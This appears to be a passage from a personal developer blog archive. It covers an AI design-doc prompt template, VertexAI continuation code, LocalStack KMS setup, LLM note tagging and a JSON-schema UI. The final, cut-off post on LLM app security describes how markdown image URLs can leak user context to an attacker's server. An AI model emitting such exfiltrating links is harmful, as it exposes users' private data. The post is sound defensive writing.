    -id: string
  }
  EntityA "1" -- "0..*" EntityB
```

## 4. API and Implementation Design

### 4.1. API Specification (OpenAPI)

```yaml
openapi: 3.0.3
info:
  title: "[Feature Name] API"
  version: "1.0.0"
paths:
  /example-endpoint:
    get:
      summary: "Example GET endpoint"
      operationId: "getExample"
      responses:
        '200':
          description: "Successful response"
```

### 4.2. Sequence Diagram

```mermaid
sequenceDiagram
  participant User
  participant Frontend
  participant Backend
  User->>Frontend: Request
  Frontend->>Backend: API Call
  Backend-->>Frontend: Response
  Frontend-->>User: Display
```

### 4.3. Database Design (Schema)

Note on Cloudflare D1 Usage:
This project uses Cloudflare D1, which does not support complex transactions.

* Avoid multi-table updates where possible.
* If necessary, ensure idempotency at the application level.
* Add indexes to columns used in search conditions for performance.

**[table_name] Table**

| Column | Type | Constraints | Description |
| :---- | :---- | :---- | :---- |
| id | TEXT | PRIMARY KEY | Unique ID |
| created_at | TEXT | NOT NULL | Creation timestamp |

```sql
CREATE TABLE [table_name] (
    id TEXT PRIMARY KEY,
    created_at TEXT NOT NULL DEFAULT (datetime('now', 'utc'))
);
```

## 5. Considerations

(Note any non-functional requirements, security, performance, or scalability concerns.)

## 6. Recommended Implementation Tasks

(This section will be filled in after the design is finalized.)

### Step 3: Request for Review

Once the draft is generated, ask the human for a review and guide them on how to provide feedback.

### Step 4: Update and Show Diffs

When the user provides feedback, update the document, increment the version number in the revision history, and clearly state what was changed. Repeat until the user confirms the design is final.

### Step 5: Generate the Implementation Task List

Once the user confirms "The design is final," analyze the entire document and generate a checklist of actionable, ordered implementation tasks in section 6.

Example AI Response:
"Thank you for confirming the design. I have added a 6. Recommended Implementation Tasks section to the design document.
Please copy and paste each task, one by one, to instruct me on implementation. Let's start with the first task."

Marble to LLM

Tue, 29 Apr 2025 00:00:00 GMT

From Marble to Model: The AI Sculpting Process

Creating something with generative AI often feels a lot like carving a Buddha statue out of a block of wood. Long before “AI” even existed, artists used similar metaphors to describe the act of revealing something precious that already lies hidden within raw material. Today, as engineers and creators, we’re doing much the same thing—only our chisel has become a prompt, and our marble is a massive neural network.

The Sculpture Analogy in Western Art

One of the most famous stories in Western art comes from Michelangelo. He claimed that the figure he sculpted from a slab of marble was already present inside the rock; his job was simply to remove the excess stone until the statue emerged. This idea—that every block of marble contains a masterpiece waiting to be freed—captures the essence of generative creation. We don’t “make” the knowledge; we uncover it.

Wisdom of Japanese Buddhist Sculptors

A parallel tradition exists in Japan. During the Edo period, master sculptors like Enkū and Mokujiki practiced natabori (鉈彫り), a technique of boldly and swiftly carving wooden statues with a single-edged axe. Legend says these artists believed the Buddha already resided within the tree, and their role was to listen to the wood’s voice and reveal its hidden form. This resonates deeply with the “craftsman’s heart”—a focus on intuition, dialogue with material, and unearthing its essential nature.

Generative AI as a Modern Chisel

For engineers today, coding often means writing lines of text in an IDE. Increasingly, it means guiding a large language model (LLM) to produce those lines for us. In the same way that Michelangelo saw form in marble and Enkū heard Buddha in wood, we see algorithms, functions, and architectures within the vast “weights” of an LLM. Our prompts become chisels, our responses the statues we coax into being.

Blog writing follows the same pattern: instead of staring at a blank page, we write a prompt; the AI drafts an outline or a paragraph; we polish, refine, and—like any good sculptor—remove what’s unnecessary until the idea stands clear.

Finding Your Voice in LLMs

The remarkable thing about a block of marble or a chunk of wood is that every piece is unique. Likewise, every engineer’s interaction with an LLM produces a different result. The knowledge embedded in the model is vast, but what emerges depends entirely on your creativity and intent.

Choice of Prompt: Just as an axe blow determines the grain you remove, the words you choose shape the AI’s output.
Iterative Refinement: Sculptors make many passes; you’ll refine your draft through feedback loops and edits.
Personal Style: Enkū’s statues have a rough-hewn immediacy, Michelangelo’s a polished grandeur—your code and writing should reflect your own sensibility.

Accelerating Creative Endeavors

By embracing generative AI as our modern tool, we gain the ability to accelerate every stage of creation: ideation, drafting, testing, and deployment. What once might have taken days of boilerplate coding or writer’s block can now be reduced to hours of prompt engineering and iterative polishing.

Yet the core principle remains unchanged: the masterpiece was always there, waiting to be revealed. Our role is to listen carefully—to the wood, the marble, or the deep neural network—identify the hidden form, and bring it to light.

Carrying the Chisel Forward: Next Steps in AI Creation

Whether you’re carving wood, sculpting marble, or sculpting text with AI, the process is fundamentally the same: uncover what’s already there. As engineers, we’re privileged to stand on the shoulders of centuries of artistic insight and apply those lessons to code and prose. With each prompt we craft, we sharpen our chisel—and with each iteration, we move one step closer to unveiling the true beauty that lies within.

Let’s continue harnessing generative AI not as a black-box magician, but as a mindful craftsman—listening, refining, and revealing the creative spark hidden within.

A Chrome Extension for Local Transcription Processing

Wed, 20 Nov 2024 00:00:00 GMT

This YouTube video is licensed under CC BY.

Motivation

While many transcription tools exist, most require uploading audio files to the cloud for processing. Due to security compliance, I've often encountered situations where uploading recorded audio to external servers isn't permissible. Tools like Siri and the Web Speech API are tailored for transcribing one's own voice and aren't suitable for meetings or conversations involving multiple speakers. Moreover, the Web Speech API sends audio data to Google, and its data usage policy isn't clearly defined. (If anyone knows where this is documented, please let me know: Google Privacy Policy.)

To address this, I decided to run a Whisper model locally using huggingface/transformers.js for transcription. I developed a Chrome extension called chrome-extension-web-transcriptor-ai. By utilizing the tabCapture API, capturing audio playing within a tab becomes straightforward. This approach allows for secure transcription entirely on the local machine without any network communication aside from the initial model download, ensuring that audio data isn't uploaded to external servers.

Challenges Faced

Initially, I wanted to use the Web Speech API for transcription but found no interface to specify input sources—it seems to accept audio only from input devices like microphones. Since I couldn't feed the tabCapture audio into the Web Speech API, I pivoted to using transformers.js. I plan to dive into the Web Speech API's implementation when I have time to confirm this limitation.

Another significant hurdle was that chrome.runtime.sendMessage can only transmit serializable objects. I struggled with passing audio data because Float32Array isn't serializable. Without realizing this, I initially tried to pass it directly, which didn't work. I ended up converting the Float32Array to a string using JSON.stringify, but this approach isn't efficient. I'm looking into better serialization methods to improve performance.

Conclusion

I'm using the onnx-community/whisper-large-v3-turbo model for Whisper. Testing so far has been on a MacBook Pro with an M2 Pro chip (32GB Memory), and it's capable of high-precision transcription in multiple languages. It's impressive that such a powerful model can now run on local devices.

With transformers.js, it's possible to run not just Whisper but also large language models (LLMs). I'm considering adding a feature to summarize transcribed content using LLMs. For subsequent processing, integrating with tools like Gemini in Chrome could be beneficial.

While the model download does involve network communication, I'm thinking about implementing a feature to allow downloads from trusted servers to enhance security.

Handling Long Responses with VertexAI API

Mon, 16 Sep 2024 00:00:00 GMT

When using generative AI to process large contexts, such as PDFs, the output may sometimes be cut off. This issue is especially common when the generated text is long. In this post, I will explain how to handle this problem using VertexAI, specifically through recursive API calls to obtain the full response.

Using "Continue" in Chat UIs

In a chat UI with VertexAI, if the output stops prematurely, you can type "continue" and the AI will pick up where it left off. However, when using API calls, you don't have this interactive capability, so a different approach is needed to handle this issue.

Handling the Issue with API Calls

To address this problem in API calls, you need to monitor the finishReason in the response. If the output is cut off, you can check this value and reissue the generation request if necessary. Below is a step-by-step guide on how to handle it.

1. Checking the Response

Within the API response, there is a finishReason that indicates why the generation stopped. You need to check this value to determine whether to send another generation request or not.

Here’s a reference from Google Cloud's documentation on VertexAI:

FINISH_REASON_UNSPECIFIED (0):

The finish reason is unspecified.

STOP (1):

Natural stop point of the model or provided
stop sequence.

MAX_TOKENS (2):

The maximum number of tokens as specified in
the request was reached.

2. Retaining Context

When reissuing a generation request, it is important to include the context of the conversation, such as previous outputs or input. If this context is not included, the AI may generate text that is unrelated to the previous output.

3. Managing Token Count

One key point to watch out for is that recursive generation requests will increase the number of input tokens. If the token count becomes too high, it can slow down processing or even hit the token limit. Therefore, it's important to manage the context carefully, trimming unnecessary parts when possible.

Code Example

Here is a concrete example from a GitHub repository that implements a mechanism to recursively retrieve responses when the output is cut off.

Code Example

// https://github.com/ainoya/PocketMD/blob/bd46bf40d83c77bba24f5c46aa64d97e07057f82/src/describe_pdf.ts#L66C15-L98C4

// Define a constant for the word to request continuation of content generation.
// This word is taken from the environment variable `CONTINUE_WORD`, and defaults to "Please continue" if not set.
const continueWord = process.env.CONTINUE_WORD || "Please continue";

// Set the maximum number of loops to prevent infinite looping during content generation.
const maxLoopCount = 10;
let loopCount = 0;

// Infinite loop to keep generating content until the stop conditions are met.
while (true) {
  // If the loop count exceeds the maximum allowed iterations, break the loop to avoid excessive processing.
  if (loopCount >= maxLoopCount) {
    console.log("Max loop count reached");
    break;
  }

  // Increment the loop counter on each iteration.
  loopCount++;

  // Log to indicate the content generation process has started.
  console.log("Generating content...");

  // Send a request to the API client to generate content based on the existing conversation context.
  const generated = await client.generateContent({
    contents: contents,
  });

  // Extract the content from the response, assuming it's in the first candidate.
  const content = generated.response.candidates?.at(0)?.content;

  // If content is successfully generated, add it to the existing conversation context.
  if (content) {
    contents.push(content); // Add the generated content to the conversation context.

    // Add a user input asking the model to continue generating content, using the defined continue word.
    contents.push({ role: "user", parts: [{ text: continueWord }] });
  } else {
    // If no content was generated, log a message and break the loop.
    console.log("No content generated");
    break;
  }

  // Check the reason why the generation stopped (e.g., reaching token limit, completion).
  const finishReason = generated.response.candidates?.at(0)?.finishReason;

  // If the reason for stopping is not due to reaching the maximum token limit, break the loop.
  // This means the content is considered "finished" or some other stop condition has occurred.
  if (finishReason !== "MAX_TOKENS") {
    console.log("Finish reason:", generated.response.candidates?.at(0)?.finishReason);
    break;
  }
}

Key Considerations

Context Retention: When reissuing a generation request, always include the previous conversation history. If you fail to do this, the AI may not generate the continuation you expect.
Token Management: Be mindful of the token count when recursively generating responses. To avoid hitting limits, trim unnecessary parts of the conversation history when possible.

By carefully monitoring the finishReason and managing the context and token count, you can effectively handle the issue of truncated responses in API-based content generation.

Experiment with LLM for Personal Knowledge Management

Sun, 15 Sep 2024 00:00:00 GMT

Recently, I've been experimenting with using Large Language Models (LLMs) for personal knowledge management. However, I've found that even when I feed information into an LLM, the output often falls within my own limited range of imagination. On the other hand, LLMs excel at summarizing and organizing diverse information compared to humans. My goal is to leverage these strengths to enhance my intellectual productivity.

Approach Overview

1. Human-Driven Information Dump

First, I write down all the miscellaneous information I acquire into notes:

Record thoughts and ideas in a Daily Journal.
Save interesting web articles and resources.

2. LLM-Driven Information Organization

Next, I use an LLM to organize and summarize this information:

Generate summarized files.
Implement LLM-based tagging.
Enclose important keywords with links.

I believe that the interplay between these two steps can lead to more efficient intellectual activity.

Tried Methods

Previously, I experimented with tagging. The knowledge management technique of linking ideas is called Linking Your Thinking (LYT). This time, I decided to try a prompt that more organically summarizes weekly notes and organizes next actions. I'm using OpenAI's o1-preview model, which has more advanced reasoning capabilities.

Prompt Used

Here is the prompt I actually used:

You are a research assistant for personal knowledge management. You will search a directory containing notes. Summarize the results and consider and suggest the next actions to develop the thinking process.

Consider original and novel research topics. Limit the topics to the field of computer science. For each topic, develop a detailed research plan, including hypotheses, verification methods, expected conclusions, and how it differs from existing research.

In addition, by looking back at the content, please tell me the knowledge gaps that I am currently lacking.

Search Command and Results

I used the following command to search for notes:

find . -type f -name "*.md" -mtime -7 -exec sh -c 'for file; do echo "<File path=\"$file\">\n"; cat "$file"; echo "\n</File>"; done' _ {} +

Results and Challenges

When I actually ran the prompt, I was not satisfied with the output, and it has not yet reached the point of automation. However, by asking various additional questions, I am using it to help with weekly reviews and introspection.

Challenges

Output Quality: The results obtained from the LLM have not met my expectations.
Automation Difficulty: I have not been able to establish an automated process because I cannot get satisfactory results.

Conclusion

LLM-powered knowledge management shows promise, but there are still many challenges at this stage. In particular, further consideration needs to be given to prompt design to improve the quality of output and how to maximize the capabilities of LLMs. I will continue to experiment and try to establish more effective knowledge management methods.

References

[2409.04109] Can LLMs Generate Novel Research Ideas? A Large-Scale Human Study with 100+ NLP Researchers

This paper investigates whether LLMs can generate novel research ideas by comparing research ideas generated by LLMs and human NLP researchers. The study found that LLM-generated ideas were judged to be more novel than those of human experts, while being judged as slightly less feasible. To generate ideas at scale, the paper employed an approach where the LLM generated 4000 ideas for a single research topic. This "large-scale generation" aimed to produce a larger pool of candidate ideas from which high-quality ideas could be selected.

However, it was found that only about 5% (200) of the 4000 ideas were truly unique and non-duplicate. As the generation process continued, the number of duplicate ideas increased, and the number of new ideas decreased. This demonstrates that large-scale generation has limitations as the diversity of ideas gradually diminishes.

IMO: It's interesting that 200 unique ideas were generated.

Using Custom Key Material with KMS in LocalStack

Sat, 14 Sep 2024 00:00:00 GMT

Introduction

In development projects that utilize AWS components, LocalStack is an incredibly handy tool. By running a single LocalStack container, you can emulate various AWS services, including KMS (Key Management Service), which is particularly useful.

In this post, I'll walk you through how to set up custom key material when creating KMS keys in LocalStack. This approach simplifies key preparation and is especially beneficial when sharing encrypted test data in a team environment.

Background

When storing sensitive customer information—like API keys for services they own—encrypting this data with KMS is a common practice. However, in a team development setting, a problem arises: each team member's KMS initializes with different key material, making it impossible to decrypt each other's encrypted test data.

One way to address this is by importing key material using aws kms import-key-material, but this process can be a bit cumbersome. Recently, it became possible to create keys with custom key material directly using awslocal kms create-key in LocalStack. This new method streamlines the key preparation steps and improves development efficiency.

Step-by-Step Guide

Here's how you can set up custom key material when creating a KMS key in LocalStack. I recommend fixing the keyId for easier handling in scripts.

1. Set Up Custom Key Material and Key ID

Generate a 32-byte random key material and define a fixed key ID:

CUSTOM_KEY_MATERIAL="$(openssl rand -base64 32)"
CUSTOM_ID="00000000-0000-0000-0000-000000000001"

CUSTOM_KEY_MATERIAL: Generates a random 32-byte key material.
CUSTOM_ID: Sets a fixed key ID.

2. Create the Key

Use the awslocal command to create a key with custom key material:

awslocal kms create-key --tags "[{\"TagKey\":\"_custom_key_material_\",\"TagValue\":\"$CUSTOM_KEY_MATERIAL\"},{\"TagKey\":\"_custom_id_\",\"TagValue\":\"$CUSTOM_ID\"}]"

This command creates a new KMS key with the custom key material and key ID specified in the tags.

Important Notes

Key Material Size

The key material must be 32 bytes. If it's not, you'll encounter an error like this:

## This will result in an error

CUSTOM_KEY_MATERIAL="invalid material"
CUSTOM_ID="00000000-0000-0000-0000-000000000001"

awslocal kms create-key --tags "[{\"TagKey\":\"_custom_key_material_\",\"TagValue\":\"$CUSTOM_KEY_MATERIAL\"},{\"TagKey\":\"_custom_id_\",\"TagValue\":\"$CUSTOM_ID\"}]" --cli-binary-format raw-in-base64-out

## Error Message
An error occurred (InternalError) when calling the CreateKey operation (reached max retries: 2): exception while calling kms.CreateKey: Incorrect padding

Key Material Format

Ensure the key material is in Base64-encoded format. If you use a hex string, you'll face errors during encryption:

## This will also result in an error

CUSTOM_KEY_MATERIAL="$(openssl rand -hex 32)"
CUSTOM_ID="00000000-0000-0000-0000-000000000001"

awslocal kms create-key --tags "[{\"TagKey\":\"_custom_key_material_\",\"TagValue\":\"$CUSTOM_KEY_MATERIAL\"},{\"TagKey\":\"_custom_id_\",\"TagValue\":\"$CUSTOM_ID\"}]" --cli-binary-format raw-in-base64-out

awslocal kms encrypt --key-id $CUSTOM_ID --plaintext supersecret --output text --query CiphertextBlob --cli-binary-format raw-in-base64-out

## Error Message
An error occurred (InternalError) when calling the Encrypt operation (reached max retries: 2): exception while calling kms.Encrypt: Invalid key size (384) for AES.

AWS CLI Option

If you're using AWS CLI v2, you'll need to specify the --cli-binary-format raw-in-base64-out option; otherwise, you'll get an error like this:

## This will result in an error

awslocal kms encrypt --key-id $CUSTOM_ID --plaintext supersecret --output text --query CiphertextBlob

## Error Message
Invalid base64: "supersecret"

Refer to the AWS CLI options documentation for more details.

Testing Encryption and Decryption

Encrypt Data

PLAINTEXT="supersecret"

CIPHERTEXT=$(awslocal kms encrypt --key-id $CUSTOM_ID --plaintext "$PLAINTEXT" --output text --query CiphertextBlob --cli-binary-format raw-in-base64-out)

echo "Ciphertext: $CIPHERTEXT"

Decrypt Data

DECRYPTED_TEXT=$(awslocal kms decrypt --ciphertext-blob fileb://<(echo "$CIPHERTEXT" | base64 -d) --output text --query Plaintext --cli-binary-format raw-in-base64-out | base64 -d)

echo "Decrypted text: $DECRYPTED_TEXT"

Expected Output: Decrypted text: supersecret

Conclusion

By using custom key material when creating KMS keys in LocalStack, you can simplify key preparation and make it easier to share encrypted test data within your team.

Key Takeaways

Key Material Format: The key material must conform to the allowed data key byte sizes.

Specifies the length of the data key in bytes. For example, use the value 64 to generate a 512-bit data key (64 bytes is 512 bits). For 128-bit (16-byte) and 256-bit (32-byte) data keys, use the KeySpec parameter.

generate_data_key - Boto3 1.35.24 documentation

When using AWS CLI v2, always include the --cli-binary-format raw-in-base64-out option.
Fixing the keyId makes scripting and automation more straightforward.

References

Why Still Blog in the Age of Generative AI?

Wed, 04 Sep 2024 00:00:00 GMT

The Rise of Generative AI and the Information Explosion

The advent of generative AI has ushered in an era of unprecedented information output. This impact is particularly evident in the academic world, where the number of papers published on platforms like arXiv is skyrocketing.

Monthly Submissions

The graph above illustrates the monthly submission count to arXiv. The red line represents an exponential approximation, hinting at the continued growth of submissions in the future.

An interesting example is the recent surge in the use of the word "delve" in academic papers, a term not commonly used in everyday language.

This phenomenon is attributed to the tendency of LLMs like ChatGPT to generate this word frequently. ([2406.07016] Delving into ChatGPT usage in academic writing through excess vocabulary)

Evidence suggests that ChatGPT is being used to assist in writing papers submitted to arXiv. This increased productivity through LLM-powered writing is expected to further boost the number of future publications.

ChatGPT and Information Access

Even for technical information, ChatGPT can provide high-quality answers without the annoyance of intrusive ads. If the information doesn't exist directly on the internet but can be interpolated from existing data, ChatGPT can likely generate it for you.

Why Bother Blogging Then?

Given this context, what is the point of writing technical blogs?

Even extrapolative thinking, the ability to generate new ideas beyond existing information, could potentially be replaced by AI agents. Imagine a scenario: "encounter a bug → search on Perplexity → fix the bug → report the fix." This entire process could be automated by AI agents in the future. For example: GitHub Next | Copilot Workspace

If we focus solely on doing things that only humans can do, we might eventually find ourselves replaced by AI in every domain. Instead, we should view blogging as a means of personal expression, akin to poetry or art. The goal shouldn't be to compete with AI, but rather to leverage blogging as a tool for expressing our unique thoughts and perspectives.

Co-creation with AI: A New Era of Blogging

There's no need to reject the use of AI as a tool for output. The crucial aspect is how we choose to curate and edit the information. This process is driven by our individual experiences, knowledge, and perspectives, stored within our neural networks – something AI cannot replicate.

Generative AI can be seen as a tool to augment our abilities and accelerate our creative process. By viewing generative AI not as a technology that disrupts us, but as a partner that enhances our creativity, we can unlock new possibilities for blog writing.

Through Human-in-the-Loop interactions, where humans and LLMs engage in a creative dialogue, we can craft more unique and engaging blog posts. For instance, we can leverage LLMs to summarize information, suggest article structures, and streamline the writing process, ultimately leading to higher-quality output.

The Evolving Value of Blogs

So, what specific value can we find in blogging today?

Personal Branding: Clarifying your expertise and values and sharing them with others can enhance your professional performance.
Sharing Extrapolative Thoughts: Blogs can serve as a platform for expressing intuitive insights and creative ideas that go beyond the capabilities of high-temperature generative AI settings.
Accelerating Creative Output: By embracing generative AI as a tool for augmenting our abilities, we can leverage Human-in-the-Loop interactions with LLMs to create distinctive and captivating blog posts.

Conclusion

The advancements in generative AI are remarkable, and they hold the potential to replace human activities in various fields. However, blogging retains its inherent value as a platform for human expression and creativity.

By utilizing generative AI as a tool to organize and articulate our thoughts, we can unlock new possibilities and continue to find meaning in the art of blogging.

Developing a Web UI for Controlling LLM JSON Output

Sun, 01 Sep 2024 00:00:00 GMT

Developing a Web UI for Controlling LLM JSON Output

Introduction

Controlling LLM (Large Language Model) output to get the desired results often requires meticulous specification of output formats and content. This is especially crucial when integrating LLM outputs into other systems, where JSON format control becomes essential.

While Gemini and OpenAI APIs allow specifying JSON schema as output options, existing JSON schema builders often have a steep learning curve due to their ability to handle all possible structures. This article introduces a Web UI that simplifies the process by applying constraints to the JSON schema output format, enabling intuitive schema building through a user-friendly GUI.

JSON Schema generator for LLM JSON formattted output

OpenAI's JSON Schema Option

Many LLM APIs, including OpenAI's, offer JSON schema options to control output in JSON format. JSON schema is a format for defining the structure of JSON data, using keywords like type, properties, and required to specify data types, properties, and mandatory fields.

For instance, you can specify the following JSON schema to output information about a person, including their name and age, in JSON format:

{
  "type": "object",
  "properties": {
    "name": {
      "type": "string"
    },
    "age": {
      "type": "integer"
    }
  },
  "required": ["name", "age"]
}

However, manually writing JSON schema can be quite tedious, especially when dealing with complex data structures.

Building JSON Schema with a Web UI

The developed Web UI, implemented using React, features a GUI that allows for intuitive JSON schema building through drag-and-drop operations. Users can easily create a JSON schema by arranging the necessary elements on the GUI and configuring their properties.

Benefits of the Web UI

This Web UI offers several advantages:

Schema Definition without LLM: No need to rely on LLMs for schema generation; developers can design schemas according to their specific needs.
Intuitive Schema Building: The GUI-based operation simplifies schema building, even for users unfamiliar with JSON schema.
Easy Adjustments: The schema can be easily edited on the GUI, allowing for quick adjustments and modifications.
Support for Multiple LLMs: Compatible with JSON schema options for various LLMs, including OpenAI and Gemini.
Schema Sharing: Created schemas can be shared easily via URL.

Web UI Use Cases

The Web UI can be applied to various use cases. Here are a few examples:

You can freely experiment with the UI at https://ainoya.github.io/llm-output-format-gen. NOTE: Operations are implemented only on the front-end to prevent sending and recording data to the server.

Let's consider a task that involves summarizing an article and simultaneously assigning topics to classify it. We'll define the JSON output structure using the GUI.

You can configure three output types:

Text: Text format, used for outputting summaries, for example.
Single Select: Single selection format, used for classifying content, for example.
Multi Select: Multiple selection format, used for assigning topics, for example.

The following screenshot shows an example:

Clicking the Generate Schema button outputs the JSON schema:

Copy the schema to the clipboard using Copy to clipboard and let's create a prompt.

Prompt example:

please read the text and output with following a JSON schema:

# Text

<Text>
...copy and paste from an article in https://ainoya-dev.pages.dev/posts/llm-application-security-practice-markdown-img-tag/
</Text>

# Output Schema

```json
{
  "type": "object",
  "additionalProperties": false,
  "properties": {
    "result": {
      "type": "object",
      "additionalProperties": false,
      "properties": {
        "items": {
          "type": "array",
          "additionalProperties": false,
          "items": {
            "oneOf": [
              {
                "type": "object",
                "additionalProperties": false,
                "properties": {
                  "type": {
                    "const": "text"
                  },
                  "key": {
                    "const": "summary"
                  },
                  "description": {
                    "const": "summarize following text."
                  },
                  "payload": {
                    "type": "object",
                    "properties": {
                      "value": {
                        "type": "string"
                      }
                    },
                    "required": [
                      "value"
                    ]
                  }
                },
                "required": [
                  "type",
                  "key",
                  "description",
                  "payload"
                ]
              },
              {
                "type": "object",
                "additionalProperties": false,
                "properties": {
                  "type": {
                    "const": "multipleSelect"
                  },
                  "key": {
                    "const": "tags"
                  },
                  "description": {
                    "const": "Topics of following text."
                  },
                  "payload": {
                    "type": "object",
                    "properties": {
                      "value": {
                        "type": "array",
                        "items": {
                          "type": "string",
                          "enum": [
                            "sport",
                            "technology"
                          ]
                        }
                      }
                    },
                    "required": [
                      "value"
                    ]
                  }
                },
                "required": [
                  "type",
                  "key",
                  "description",
                  "payload"
                ]
              }
            ]
          }
        }
      },
      "required": [
        "items"
      ]
    }
  },
  "required": [
    "result"
  ]
}

With GPT-4, this prompt generates the following result, formatted for use with the EAV pattern:

{
  "result": {
    "items": [
      {
        "type": "text",
        "key": "summary",
        "description": "summarize following text.",
        "payload": {
          "value": "The article discusses the potential security risks of rendering markdown images in LLM (Large Language Model) applications. It highlights how embedding images using markdown can expose sensitive data through image URLs, which may be exploited by malicious actors. The article provides methods to mitigate these risks, such as disabling image embedding entirely or whitelisting trusted hosts. Example TypeScript code is provided to demonstrate these approaches. The importance of implementing robust security measures, especially in applications dealing with user-generated content (UGC), is emphasized."
        }
      },
      {
        "type": "multipleSelect",
        "key": "tags",
        "description": "Topics of following text.",
        "payload": {
          "value": ["technology"]
        }
      }
    ]
  }
}

The definition used in this example can be shared as a URL using the Share URL feature. Here's the URL for the schema shown in the example.

Future Development

The Web UI is still under development, and the following tasks remain:

Support for OpenAI's Structured Outputs: Currently, the UI doesn't support specifying options for OpenAI's Structured Outputs because structured output doesn't support the oneOf notation in JSON schema. It also doesn't support the schema specification option for Gemini (Vertex AI). Only JSON output specification is possible via API options; schemas are used by directly inputting them into the prompt.

Caveats

There are reports that forcing complex JSON outputs or structured outputs on LLMs can degrade output quality. In simple tasks, based on my observations, the impact of quality degradation was minimal.

Conclusion

This article introduced a Web UI developed for controlling LLM JSON output. This UI simplifies the process of controlling LLM outputs in JSON format, making it easier to integrate them into various systems.

References

JSON Schema generator for LLM JSON formattted output
ainoya/llm-output-format-gen: Source code
JSON Schema Builder: This is very useful for building various JSON schemas
Structured Outputs - OpenAI API
Control generated output | Generative AI on Vertex AI | Google Cloud

Day 0 Operations: Minimizing Risks in Manual Processes for New Products

Sat, 31 Aug 2024 00:00:00 GMT

It's become standard practice to automate and codify product operations. When launching a new product, you're often starting from scratch with these automation efforts.

While external services have made setting up environments significantly more efficient, achieving perfect automation from the outset can be challenging for many products. It's more common to build the environment and continuously reduce toil as the product develops.

This inevitably involves manual processes. While it's acceptable to perform tasks manually with the intention of automating them later, are we underestimating the risks associated with these manual operations? Consider deployments, data migrations, data changes during incident response, and data investigations.

As Heinrich's Law suggests, overlooking small risks can lead to significant problems down the line. Certain precautions should be taken when performing manual tasks. Just because a process isn't automated doesn't mean we should approach risky operations like data queries with creative, on-the-spot solutions. This can be dangerous.

Key Principles for Manual Operations

Here are some key principles to keep in mind:

1. The Principle of Least Astonishment

Avoid surprising your team with unexpected information when performing tasks or communicating updates (happy surprises excluded!).
Surprises often indicate a lack of awareness beforehand, meaning someone who should have been informed wasn't. Ensure transparency within the team so that all operations are predictable. Teamwork relies on shared understanding.

2. Document Everything

Before the Operation:
- Create detailed procedures based on anticipated steps.
- Conduct team reviews of these procedures to identify gaps or omissions.
- On the day of the operation, simply follow the documented steps mechanically. This reduces psychological burden and promotes safe execution.
Rehearsal:
- Depending on the importance of the operation, conduct a dry run without making actual changes.
- Execute commands with dry-run options enabled or run read-only queries to simulate the process.
- Even well-written documentation can reveal unexpected errors or missing steps during a dry run.
During the Operation:
- Comment and record each step and its outcome. This helps prevent secondary damage caused by panicked, undocumented commands during incident response.
- Communicate with your team before and during the operation. Avoid silent execution, especially when multiple team members are making changes, as the combined outcome can be unpredictable.
Verification:
- For pull requests, document manual testing performed, especially for cases where unit tests are difficult to write due to limitations in the testing environment. For UI testing, capture videos or screenshots.
- This helps with post-incident analysis, making it easier to identify testing gaps and determine necessary test cases or implementation improvements to prevent recurrence.

Benefits of Documentation

Short-term: Standardize common procedures through documented templates.
Long-term: Provide requirements for future automation efforts. Analyze and categorize documented tasks to prioritize automation initiatives.

3. Generate Meaningful Logs

Go beyond generic error messages. Strive for logs that provide insights into the issue.
Bad Log: "An error occurred." This doesn't offer any helpful information beyond the fact that an exception was thrown.
Good Log: "Data synchronization error with Service A: Service A API is temporarily unavailable. Failed values: value1, value2, value3." This log clearly explains the problem, reducing the need to dig into the code. It also identifies the specific values that caused the failure.

Practical Examples

Release (Deployment)

If deployments occur on a fixed schedule, hold a release planning meeting with the team beforehand. Use this opportunity to align everyone on the upcoming activities. Consider using a tool like Notion to automatically create a release plan document.
Include the following in the template:
- Release Date and Time
- Release Engineer
- Release Scope
- Data Migration (Yes/No)
  - Details of planned queries and their potential impact on production system performance.
- Post-Release Verification Steps
- Rollback Procedures

Data Modification

Treat production data changes with extreme caution. Implement query reviews for RDBMS systems.
Maintain a record of executed queries along with their results. While transaction logs and binary logs can provide this information retrospectively, having readily available query results simplifies root cause analysis in case of secondary issues.
Consider using a template like this:
- Purpose and Summary of the Change
- Planned Query
- Pre-Execution Verification Query and Results
- Post-Execution Verification Query and Results

Conclusion

This post explored strategies for managing manual operations in the early stages of a web service's lifecycle, before full automation is achieved. The core principles to embrace are: 1. Principle of Least Astonishment, 2. Shared Understanding, and 3. Comprehensive Documentation.

In the future, AI agents might handle these manual tasks. The principles discussed here can serve as guidelines for designing and training these agents, ensuring they operate reliably and predictably.

Automating My Note Tagging with LLMs

Sun, 25 Aug 2024 00:00:00 GMT

I've been using tags to organize and connect my notes locally. This has been especially helpful when navigating related information within Obsidian. While tagging has been useful, it's also been a manual and tedious process. I previously considered using morphological analysis to extract keywords as tags, but the results were often noisy and didn't capture the core meaning of my notes.

Recently, I started experimenting with LLMs to see if they could help. My idea was to feed my notes into an LLM and use prompts to extract the most important topics, which could then be used as tags. The results were promising!

I implemented this solution in my PocketMD project, leveraging Vertex AI to generate tags and append them to the frontmatter of my notes. Both Vertex AI and Gemini offer the ability to specify the output format using JSON and schemas. However, I found that this option is only available with Gemini Pro and not Gemini Flash. Here's an example of the schema definition:

  const schema: ResponseSchema = {
    type: FunctionDeclarationSchemaType.OBJECT,
    properties: {
      tags: {
        // string array
        type: FunctionDeclarationSchemaType.ARRAY,
        // @ts-ignore
        items: {
          type: FunctionDeclarationSchemaType.STRING,
        },
      },
    },
  };

I encountered an error when trying to add a type to the array elements using the TypeScript types provided by @google-cloud/vertexai. I had to use @ts-ignore as a temporary workaround.

It's worth noting that advanced JSON schema features like allOf and oneOf didn't work for API validation, both with Vertex AI and OpenAI's structure output (as of August 25, 2024).

While the LLM generally adhered to the specified output format, I still needed to refine the values using prompts. For instance, even when specifying that tags should start with a hashtag, the LLM occasionally missed this or added extra double quotes. I ended up using regular expressions to clean up the generated output.

This implementation has significantly improved my workflow. I can now automatically tag both new and existing notes with a simple script, making it much easier to connect ideas and revisit past information. This has been a game-changer for organizing my thoughts and staying on top of my ever-growing collection of notes.

References

LLM Application Security Practice: Markdown Image Tag

Sat, 03 Aug 2024 00:00:00 GMT

Rendering Markdown Images in LLM Apps? Proceed with Caution

It's a common practice to render markdown-formatted text into HTML for user responses in LLM applications. Markdown's image embedding syntax, ![image alt text](image url), seamlessly integrates images into the HTML output. But here's the catch – this convenience can be a potential security pitfall.

When an image is rendered in HTML, the browser accesses its URL. This opens up a subtle attack vector:

Malicious actors can craft URLs with embedded parameters containing sensitive user context or personal information.
When the browser fetches the image, this data leaks to the external server via the URL parameters, potentially ending up in server logs or worse.

How to Mitigate the Risk

Fortunately, there are several ways to prevent this type of data leakage:

